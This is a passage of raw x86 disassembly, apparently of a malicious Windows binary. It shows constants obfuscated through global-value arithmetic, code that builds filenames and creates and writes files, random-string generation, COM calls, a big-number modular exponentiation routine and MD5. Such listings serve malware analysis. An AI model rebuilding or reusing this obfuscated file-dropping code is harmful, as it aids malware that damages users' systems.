movsx ecx, word ptr ds:100120E0h
movsx edi, word ptr ds:10012090h
add ecx, edi
sub ecx, 0Ah
cmp edx, ecx
jnz loc_423ED5
mov edx, [ebp+var_31F40]
mov ecx, [ebp+var_31F44]
add edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+ecx]
mov ecx, ds:100120ACh
sub ecx, 2
cmp edx, ecx
jnz loc_423ED5
mov edx, ds:10012110h
sub edx, 4
add eax, edx
mov edx, [ebp+var_31F3C]
movzx eax, byte ptr [edx+eax]
cmp eax, ds:10012128h
jnz loc_423ED5
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1184]
mov [ebp+var_31F4C], eax
movsx eax, word ptr ds:1001211Ch
movsx edx, word ptr ds:1001214Ch
lea eax, [eax+edx-7]
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
mov edx, ds:100120ECh
movsx ecx, word ptr ds:100120F0h
add edx, ecx
dec edx
sub eax, edx
mov [ebp+var_31F50], eax
mov edi, ds:100120ECh
mov edx, [ebp+var_C]
mov ecx, ds:1001210Ch
add ecx, ds:10012134h
sub ecx, 6
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4], ecx
loc_423ED5: ; CODE XREF: sub_422D6E+1010�j
; sub_422D6E+1053�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F48], edx
movzx ecx, byte ptr [edx+eax]
mov edi, ds:10012148h
add edi, 0E6h
add edi, ds:10012128h
cmp ecx, edi
jnz loc_42403A
movsx ecx, word ptr ds:10012120h
mov [ebp+var_31F4C], ecx
movsx edi, word ptr ds:100120E0h
mov edx, ecx
add edx, edi
sub edx, 0Fh
mov edi, eax
add edi, edx
mov edx, [ebp+var_31F48]
movzx edx, byte ptr [edx+edi]
movsx edi, word ptr ds:100120CCh
add edi, ds:10012104h
sub edi, 9
cmp edx, edi
jnz loc_42403A
mov edx, ds:100120C8h
mov edi, edx
add edi, ds:100120B0h
sub edi, 7
mov ecx, eax
add ecx, edi
mov edi, [ebp+var_31F48]
movzx ecx, byte ptr [edi+ecx]
movsx edi, word ptr ds:1001213Ch
add edi, ds:100120ECh
sub edi, 7
cmp ecx, edi
jnz loc_42403A
mov ecx, ds:10012134h
add ecx, edx
mov edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F48]
movzx edx, byte ptr [edx+ecx]
mov ecx, ds:100120FCh
add ecx, ds:100120D4h
sub ecx, 3
cmp edx, ecx
jnz loc_42403A
mov edx, [ebp+var_31F4C]
sub edx, 4
add eax, edx
mov edx, [ebp+var_31F48]
movzx eax, byte ptr [edx+eax]
mov edx, ds:100120A8h
sub edx, 4
cmp eax, edx
jnz short loc_42403A
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F50], eax
mov eax, [ebp+var_118C]
mov [ebp+var_31F54], eax
mov eax, ds:10012144h
add eax, 0FFFFFFFFh
sub eax, [ebp+var_31F50]
add eax, [ebp+var_31F54]
mov edx, ds:100120C4h
add edx, ds:10012094h
sub eax, edx
mov [ebp+var_31F58], eax
movsx edi, word ptr ds:100120B4h
mov edx, [ebp+var_C]
mov ecx, ds:100120F8h
sub ecx, 6
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-14h], ecx
loc_42403A: ; CODE XREF: sub_422D6E+118B�j
; sub_422D6E+11CC�j ...
inc [ebp+var_C]
loc_42403D: ; CODE XREF: sub_422D6E+FDE�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_423D51
push [ebp+var_1070]
call dword ptr ds:10010650h
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000E1F4h
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_424077: ; CODE XREF: sub_422D6E+130E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_424077
mov [ebp+var_31ED4], eax
movsx edx, word ptr ds:10012114h
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED4]
mov edx, ds:100120D4h
add edx, 2
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED4]
mov edx, ds:10012100h
sub edx, 2
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, ds:10012138h
movsx edx, word ptr ds:100120F0h
add eax, edx
sub eax, 7
push eax
push 2
push 0
mov eax, ds:100120C0h
sub eax, 3
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10011788h
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:10011B8Ch
push [ebp+var_1070]
call dword ptr ds:10010650h
push [ebp+var_4]
call dword ptr ds:1000E618h
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000F364h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000C008h
mov eax, 1
jmp short loc_42416D
; ---------------------------------------------------------------------------
loc_424156: ; CODE XREF: sub_422D6E+BD�j
; sub_422D6E+D7�j ...
push [ebp+var_1070]
call dword ptr ds:10010650h
push [ebp+var_4]
call dword ptr ds:1000E618h
xor eax, eax
loc_42416D: ; CODE XREF: sub_422D6E+59�j
; sub_422D6E+13E6�j
pop edi
pop esi
pop ebx
leave
retn
sub_422D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424172 proc near ; CODE XREF: sub_41BEF1+3E4�p
; sub_41D704+140�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, ds:100120C4h
sub esi, 4
jmp short loc_4241B2
; ---------------------------------------------------------------------------
loc_424186: ; CODE XREF: sub_424172+43�j
call dword ptr ds:10011BACh
mov edi, ds:10012124h
add edi, 5Fh
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_4241B2: ; CODE XREF: sub_424172+12�j
cmp esi, [ebp+arg_4]
jl short loc_424186
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:10012120h
sub edx, 8
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_424172 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4241CE proc near ; CODE XREF: sub_41BEF1+334�p
; sub_41BEF1+3C7�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_168]
push eax
call sub_424555
push 100126FCh
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 100126F4h
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
push 0
push 80h
push 4
push 0
mov eax, ds:100120FCh
movsx edx, word ptr ds:1001212Ch
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10011B9Ch
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_424286: ; CODE XREF: sub_4241CE+BD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_424286
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call dword ptr ds:10011B8Ch
push edi
call dword ptr ds:10010650h
pop edi
pop esi
pop ebx
leave
retn
sub_4241CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4242AF proc near ; CODE XREF: sub_41FE14+248�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_421597
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_4244D5
mov [ebp+var_18], 8
push 100126E4h
call sub_422C45
pop ecx
push eax
call dword ptr ds:1000C044h
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:10012108h
add eax, ds:100120ACh
sub eax, 7
cmp ebx, eax
jnz loc_4244BF
lea eax, [ebp+var_3C]
push eax
push 100138A0h
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:100120E0h
add eax, ds:100120FCh
sub eax, 0Bh
cmp ebx, eax
jnz loc_4244B6
mov [ebp+var_30], 2
mov eax, ds:1001209Ch
sub eax, 3
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
cmp ebx, ds:10012128h
jnz loc_4244AD
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 10013890h
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100120D4h
add eax, ds:1001210Ch
sub eax, 3
cmp ebx, eax
jnz loc_4244A4
inc dword ptr ds:1000E61Ch
movsx eax, word ptr ds:100120B4h
add eax, 5
cmp ds:1000E61Ch, eax
jb short loc_424406
mov eax, ds:1001209Ch
movsx edx, word ptr ds:10012140h
add eax, edx
mov ds:1000E61Ch, eax
push [ebp+var_4]
call sub_41FBE3
pop ecx
jmp loc_42449B
; ---------------------------------------------------------------------------
loc_424406: ; CODE XREF: sub_4242AF+134�j
movsx eax, word ptr ds:10012120h
sub eax, 8
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push dword ptr ds:1001063Ch
call sub_41E027
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push dword ptr ds:1000C018h
call sub_41E027
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_42445B
cmp [ebp+var_34], 0
jz short loc_42445B
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_41D704
add esp, 10h
loc_42445B: ; CODE XREF: sub_4242AF+18F�j
; sub_4242AF+195�j
cmp [ebp+var_40], 0
jz short loc_42447C
cmp [ebp+var_38], 0
jz short loc_42447C
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_41D704
add esp, 10h
loc_42447C: ; CODE XREF: sub_4242AF+1B0�j
; sub_4242AF+1B6�j
push [ebp+var_34]
call dword ptr ds:1000E618h
push [ebp+var_38]
call dword ptr ds:1000E618h
push 0
push [ebp+arg_4]
call sub_421597
add esp, 8
loc_42449B: ; CODE XREF: sub_4242AF+152�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4244A4: ; CODE XREF: sub_4242AF+118�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4244AD: ; CODE XREF: sub_4242AF+E6�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4244B6: ; CODE XREF: sub_4242AF+9C�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4244BF: ; CODE XREF: sub_4242AF+6C�j
lea eax, [ebp+var_18]
push eax
call dword ptr ds:10011BA0h
mov eax, ds:100120C8h
sub eax, 4
cmp ebx, eax
jz short $+2
loc_4244D5: ; CODE XREF: sub_4242AF+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4242AF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 100138F0h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_424506
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_42454E
; ---------------------------------------------------------------------------
loc_424506: ; CODE XREF: .data:004244F4�j
push 10013870h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_424526
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_42454E
; ---------------------------------------------------------------------------
loc_424526: ; CODE XREF: .data:00424514�j
push 10013840h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_424546
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_42454E
; ---------------------------------------------------------------------------
loc_424546: ; CODE XREF: .data:00424534�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_42454E: ; CODE XREF: .data:00424504�j
; .data:00424524�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424555 proc near ; CODE XREF: sub_41B8EA+24�p
; sub_41BA16+24�p ...
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call dword ptr ds:1000E5FCh
movsx eax, word ptr ds:1001211Ch
movsx edx, word ptr ds:100120F0h
add edx, eax
sub edx, 7
mov [ebp+eax+var_107], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call dword ptr ds:10011614h
push 100126DCh
call sub_41E33D
push [ebp+var_10C]
push eax
push edi
call dword ptr ds:10011634h
add esp, 10h
mov eax, ds:100120FCh
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_424619
; ---------------------------------------------------------------------------
loc_4245EA: ; CODE XREF: sub_424555+D8�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_424600
cmp al, 39h
jg short loc_424600
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_424600: ; CODE XREF: sub_424555+9D�j
; sub_424555+A1�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_424616
cmp al, 5Ah
jg short loc_424616
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_424616: ; CODE XREF: sub_424555+B3�j
; sub_424555+B7�j
inc [ebp+var_4]
loc_424619: ; CODE XREF: sub_424555+93�j
movsx eax, word ptr ds:100120CCh
mov edx, ds:10012094h
lea eax, [eax+edx+1]
cmp [ebp+var_4], eax
jb short loc_4245EA
pop edi
leave
retn
sub_424555 endp
; ---------------------------------------------------------------------------
dw 9090h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424635 proc near ; CODE XREF: sub_4221EB+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, ds:10013950h
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_424700
xor edx, edx
loc_424665: ; CODE XREF: sub_424635+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_424677
mov edx, [ebp+arg_4]
call sub_424691
loc_424677: ; CODE XREF: sub_424635+38�j
lea edx, ds:10013950h
call sub_424691
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_424665
popa
pop ebp
retn 10h
sub_424635 endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_424691 proc near ; CODE XREF: sub_424635+3D�p
; sub_424635+48�p
lea edi, ds:10013910h
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, ds:10013950h
call sub_424700
loc_4246AB: ; CODE XREF: sub_424691+5D�j
lea edi, ds:10013910h
mov ecx, 10h
xor eax, eax
loc_4246B8: ; CODE XREF: sub_424691+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_4246B8
call sub_424711
bt ds:10013950h, ebx
jnb short loc_4246ED
mov esi, edx
lea edi, ds:10013910h
xor eax, eax
mov ecx, 10h
loc_4246DC: ; CODE XREF: sub_424691+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4246DC
call sub_424711
loc_4246ED: ; CODE XREF: sub_424691+3A�j
dec ebx
jns short loc_4246AB
mov edi, edx
lea esi, ds:10013910h
mov ecx, 10h
rep movsd
retn
sub_424691 endp
; =============== S U B R O U T I N E =======================================
sub_424700 proc near ; CODE XREF: sub_424635+29�p
; sub_424691+15�p
mov ebx, 1FFh
loc_424705: ; CODE XREF: sub_424700+B�j
bt [edi], ebx
jb short locret_42470D
dec ebx
jnz short loc_424705
locret_42470D: ; CODE XREF: sub_424700+8�j
retn
sub_424700 endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_424711 proc near ; CODE XREF: sub_424691+2E�p
; sub_424691+57�p
lea esi, ds:10013910h
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_42471F: ; CODE XREF: sub_424711+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_424748
ja short loc_42472C
dec ecx
jns short loc_42471F
loc_42472C: ; CODE XREF: sub_424711+16�j
mov esi, [ebp+14h]
lea edi, ds:10013910h
xor eax, eax
mov ecx, 10h
loc_42473C: ; CODE XREF: sub_424711+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_42473C
locret_424748: ; CODE XREF: sub_424711+14�j
retn
sub_424711 endp
; =============== S U B R O U T I N E =======================================
sub_424749 proc near ; CODE XREF: sub_42479A+32�p
; sub_42479A+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_424749 endp
; =============== S U B R O U T I N E =======================================
sub_424756 proc near ; CODE XREF: sub_42479A+219�p
; sub_42479A+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_424756 endp
; =============== S U B R O U T I N E =======================================
sub_424763 proc near ; CODE XREF: sub_42479A+420�p
; sub_42479A+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_424763 endp
; =============== S U B R O U T I N E =======================================
sub_42476A proc near ; CODE XREF: sub_42479A+627�p
; sub_42479A+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_42476A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424773 proc near ; CODE XREF: sub_420BEA+76�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_424773 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42479A proc near ; CODE XREF: sub_420BEA+8E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov ds:10013990h, eax
mov eax, [edi+4]
mov ds:10013994h, eax
mov eax, [edi+8]
mov ds:10013998h, eax
mov eax, [edi+0Ch]
mov ds:1001399Ch, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424749
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424749
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424749
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424749
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424749
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424749
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424749
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424749
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424749
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424749
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424749
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424749
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424749
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424749
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424749
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424756
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424756
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424756
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424756
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424756
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424756
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424756
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424756
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424756
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424756
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424756
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424756
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424756
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424756
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424756
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424756
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424763
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424763
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424763
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424763
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424763
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424763
add eax, [edi+0Ch]
